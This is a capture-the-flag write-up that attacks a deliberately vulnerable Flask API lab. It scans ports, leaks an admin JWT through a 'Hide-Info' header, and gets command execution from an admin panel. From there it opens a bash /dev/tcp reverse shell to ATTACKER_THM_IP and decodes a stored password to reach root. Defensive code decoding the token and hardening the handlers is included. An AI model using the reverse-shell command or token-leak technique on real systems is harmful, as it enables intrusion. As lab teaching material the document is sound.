Target Details

  • Target IP: 10.10.149.135

Service Discovery

  • Scan Open ports using nmap

    $ sudo nmap -sS -sV -sC -Pn -A -oN nmap.txt 10.10.149.135
    Nmap scan report for 10.10.149.135
    Host is up (0.45s latency).
    Not shown: 997 closed tcp ports (reset)
    PORT     STATE SERVICE VERSION
    22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   3072 86:65:28:5a:90:b3:1f:8e:9c:0b:62:3a:71:4b:97:37 (RSA)
    |   256 87:37:9b:9d:fc:c4:dd:bc:21:0c:d9:a2:ab:96:90:be (ECDSA)
    |_  256 a2:fd:4a:10:db:5b:ce:3d:c2:2c:c0:0c:8f:be:6c:41 (ED25519)
    80/tcp   open  http    nginx 1.18.0 (Ubuntu)
    |_http-title: Welcome to nginx!
    |_http-server-header: nginx/1.18.0 (Ubuntu)
    5000/tcp open  upnp?
    | fingerprint-strings:
    |   GenericLines:
    |     HTTP/1.1 400 Bad Request
    ...
    
    ...
    Network Distance: 4 hops
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    TRACEROUTE (using port 143/tcp)
    HOP RTT       ADDRESS
    1   354.40 ms 10.2.0.1
    2   ... 3
    4   447.88 ms 10.10.149.135
    
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    
  • Services Found:

    Service       Port   Version
    SSH           22     OpenSSH 8.2p1
    HTTP          80     nginx/1.18.0
    Web Service   5000   Unknown
  • Answer the Task questions

Content Discovery

  • Visit the web application in browser

  • Common endpoints are /api or api.domain.com.

    /api worked!

  • We can find other endpoints by crawling through the web application manually with the Burp Suite proxy running.

  • On inspecting the HTML, we see that the admin has left a message for the hacker in a page comment!

    <!--     
    This is a normal login page, I've always been smarter than you, I've only created sign up action to `users` using API!
    If you want access, Hack the way in by finding endpoint and signing up or find flaw in the endpoint!
      
    - vuln admin
    -->
    

    From the comment we can conclude that we cannot sign up directly from the login page; we need to find the API endpoint for signing up. The admin has also hinted at the endpoint used for user sign-up (`users`).

  • On visiting the /api/users endpoint, we get a JSON response providing information about other users!

    {
      "users": [
        {
          "userid": 1,
          "first_name": "Martin",
          "last_name": "Rodriguez",
          "admin": false
        },
        {
          "userid": 2,
          "first_name": "Kristen",
          "last_name": "Martin",
          "admin": false
        },
        ....
        {
          "userid": 27,
          "first_name": "Derek",
          "last_name": "Washington",
          "admin": true
        }
      ]
    }
    

    We got the user details: names, user IDs and their role in the application.

  • In most cases an endpoint supports several HTTP methods; let's verify this using the OPTIONS method. Visit the same users endpoint, send the request to Repeater this time, and change the HTTP method from GET to OPTIONS.

    GET /api/users HTTP/1.1
    
    # change to
    OPTIONS /api/users HTTP/1.1
    
  • On visiting dmdhrumilmistry's GitHub profile, the Vulnerable-API-App repository's app.py file lists all the endpoints. The useful ones for now are listed below.

  • Endpoints discovered using Burp Suite:

    Endpoint       HTTP Methods Allowed
    /api/users/    DELETE, HEAD, OPTIONS, GET
    /api/users     POST, OPTIONS, HEAD, GET

Exploit Endpoints

  • From the /api/user/<userid:int> endpoint we can get a user's details, and from the /api/users endpoint we can retrieve the admin's user ID and try to get their account details. In my case the admin ID is 27.

    The admin ID will vary.

  • Send a Burp request to /api/user/27; we receive the JSON response:

    {
      "admin": true,
      "first_name": "Derek",
      "last_name": "Washington",
      "userid": 27
    }
    
  • Using the first question's hint, we know that we need to send the Hide-Info header in the HTTP request.

    • Burp Request
    GET /api/user/27 HTTP/1.1
    Hide-Info: 0
    
    • Burp JSON Response
    {
      "admin": true,
      "email": "admin@vuln-api-app.com",
      "first_name": "Derek",
      "last_name": "Washington",
      "token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTY1NzcwODY4OSwianRpIjoiYjBhNzdmODgtZjcyMS00ZjhkLTgyOGUtYWRlNzIwZjI3ODcwIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImFkbWluQHZ1bG4tYXBpLWFwcC5jb20iLCJuYmYiOjE2NTc3MDg2ODl9.94MZ1fRrRrIdt_FFnLQdjGMWHbvA5_cSnwYfiaVl0Jw",
      "userid": 27
    }
    

    Now we have received the admin's token.
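The token above is a JWT, so its claims can be read without the signing key. The following is an added example (not part of the original write-up) that decodes the header and payload of the token shown in the Burp response and flags what a reviewer would care about; it does not verify the signature, so it needs no secret.

```python
import base64
import json

# The token exactly as it appeared in the Burp JSON response above.
LEAKED_TOKEN = (
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9."
    "eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTY1NzcwODY4OSwianRpIjoiYjBhNzdmODgtZjcyMS00ZjhkLTgyOGUtYWRlNzIwZjI3ODcwIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImFkbWluQHZ1bG4tYXBpLWFwcC5jb20iLCJuYmYiOjE2NTc3MDg2ODl9."
    "94MZ1fRrRrIdt_FFnLQdjGMWHbvA5_cSnwYfiaVl0Jw"
)


def b64url_decode(segment: str) -> bytes:
    """JWT segments are base64url without '=' padding; restore it before decoding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def inspect_jwt(token: str) -> dict:
    """Return the decoded header and payload plus review findings.

    The signature is NOT checked here: this only reads what the token claims.
    """
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    payload = json.loads(b64url_decode(payload_b64))

    findings = []
    if "exp" not in payload:
        findings.append("no exp claim: a leaked token stays valid until the key is rotated")
    if header.get("alg", "").lower() == "none":
        findings.append("alg=none: the signature is not enforced")
    if payload.get("type") == "access" and "sub" in payload:
        findings.append(f"bearer access token issued to {payload['sub']}")

    return {
        "header": header,
        "payload": payload,
        "signature_bytes": len(b64url_decode(sig_b64)),  # 32 for HS256
        "findings": findings,
    }


if __name__ == "__main__":
    print(json.dumps(inspect_jwt(LEAKED_TOKEN), indent=2))
```

Seeing the subject, issue time and the absence of an exp claim tells the defender that revoking this token means rotating the server's signing key, not waiting for it to expire.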

  • We can add the token to every request in Burp Suite using the Custom Header extension. Refer to the extension's docs for installation and usage, then add the authorization token to the extension.

  • Now add http://10.10.149.135:5000 to the target scope and capture in-scope requests only.

  • Configure the Custom Header extension to add the header while using the proxy:

    • Project Options
    • Sessions
    • From Session Handling Rules, click on the Add button
    • Provide a description
    • Click on the Add button under Rule Actions
    • Choose Invoke a Burp extension
    • Set the extension handler to Add Custom Header
    • Click on OK
    • From the Scope tab, tick the Proxy checkbox so headers are added while using the proxy. Also set URL Scope to Use suite scope
    • Click on OK
  • Visit the home page at http://10.10.149.135:5000
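The root cause behind this section, reconstructed as an added example rather than the room's actual app.py: a user listing that needs no authentication and exposes the admin flag, and a per-user endpoint whose client-supplied Hide-Info header decides whether the email and token are returned. The records, token strings and function names are constructed; each flawed handler is shown next to a hardened form written as plain functions so it runs without Flask.

```python
# Constructed user store mirroring the shape of the /api/users response.
USERS = {
    1:  {"userid": 1, "first_name": "Martin", "last_name": "Rodriguez", "admin": False,
         "email": "martin@example.test", "token": "constructed-token-1"},
    27: {"userid": 27, "first_name": "Derek", "last_name": "Washington", "admin": True,
         "email": "admin@vuln-api-app.com", "token": "constructed-token-27"},
}
PUBLIC_FIELDS = ("userid", "first_name", "last_name")


def user_detail_vulnerable(userid, headers):
    """Flawed: no authentication, and a client-controlled header decides what is hidden."""
    user = USERS.get(userid)
    if user is None:
        return 404, {"error": "user not found"}
    if headers.get("Hide-Info", "1") == "0":   # any caller can send Hide-Info: 0
        return 200, dict(user)                  # leaks the email and the user's token
    return 200, {k: user[k] for k in (*PUBLIC_FIELDS, "admin")}


def user_detail_hardened(userid, requester):
    """Fixed: `requester` is the user ID from a verified session, never a header.

    Tokens are never echoed back; private fields go only to the owner or an admin.
    """
    user = USERS.get(userid)
    if user is None:
        return 404, {"error": "user not found"}
    if requester is None or requester not in USERS:
        return 401, {"error": "authentication required"}
    body = {k: user[k] for k in PUBLIC_FIELDS}
    if requester == userid or USERS[requester]["admin"]:
        body["email"] = user["email"]
        body["admin"] = user["admin"]
    return 200, body


def list_users_hardened(requester):
    """Fixed listing: authenticated callers see names only, not who the admins are."""
    if requester is None or requester not in USERS:
        return 401, {"error": "authentication required"}
    return 200, {"users": [{k: u[k] for k in PUBLIC_FIELDS} for u in USERS.values()]}
```

Whether a field is sensitive must be decided server-side from the verified identity of the caller, and an access token should only ever travel from the login endpoint to the client that authenticated.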

Get Target Machine Shell

  • Visit the home page, logged in with the admin auth token

  • From the home page, visit the Admin Controls tab, from where we can run bash commands

  • Using the GTFOBins Bash reverse shell, get a reverse shell

  • Start Netcat on the attacker's machine

    nc -nlvp 4444
    
  • Enter the command below in the command input field

    bash -c 'exec bash -i &>/dev/tcp/ATTACKER_THM_IP/4444 <&1'
    
  • On execution of the command, we get a reverse shell on the attacker machine

    $ nc -nlvp 4444
    listening on [any] 4444 ...
    connect to [ATTACKER_THM_IP] from (UNKNOWN) [10.10.226.214] 33472
    bash: cannot set terminal process group (610): Inappropriate ioctl for device
    bash: no job control in this shell
    [email protected]:~/deployment/apps/Vulnerable-API-app$
    

Get User Flag

  • Read User Flag

    [email protected]:~/deployment/apps/Vulnerable-API-app$ cat $HOME/user.txt
    THM{REDACTED}
    

Privilege Escalation

  • Check whether vulnadmin has sudo permissions

    [email protected]:~$ groups
    sudo adm cdrom dip plugdev lxd
    

    vulnadmin has sudo permission (it is in the sudo group), but we first need to find its password to run sudo commands.

  • On listing the files in vulnadmin's home directory, we find a backup.txt file

    [email protected]:~$ ls -l
    total 12
    -rw-rw-r-- 1 vulnadmin vulnadmin   45 Jul 12 14:58 backup.txt
    drwxrwxr-x 3 vulnadmin vulnadmin 4096 Jul 12 11:27 deployment
    -rw-rw-r-- 1 vulnadmin vulnadmin   30 Jul 12 13:21 user.txt
    
  • On reading the file, its contents appear to be base64-encoded

  • Decode the backup.txt file

    [email protected]:~$ cat backup.txt | base64 -d
    {REDACTED}
    

    It is the password for the vulnadmin account.

  • To run sudo we need to spawn a terminal first. Since the deployed application runs on Flask, which is a Python framework, Python must be installed; this can be verified using

    [email protected]:~$ python3 --version
    Python 3.8.10
    
  • Get an interactive shell

    [email protected]:~$ python3 -c 'import pty;pty.spawn("/bin/bash")'
    
  • List the commands which vulnadmin can run with root privileges

    [email protected]:~$ sudo su
    [sudo] password for vulnadmin: {REDACTED}
    [email protected]:/home/vulnadmin/#
    
  • Get Root Flag

    [email protected]:~# cat /root/root.txt
    cat /root/root.txt
    THM{REDACTED}
    
  • We have successfully rooted the machine!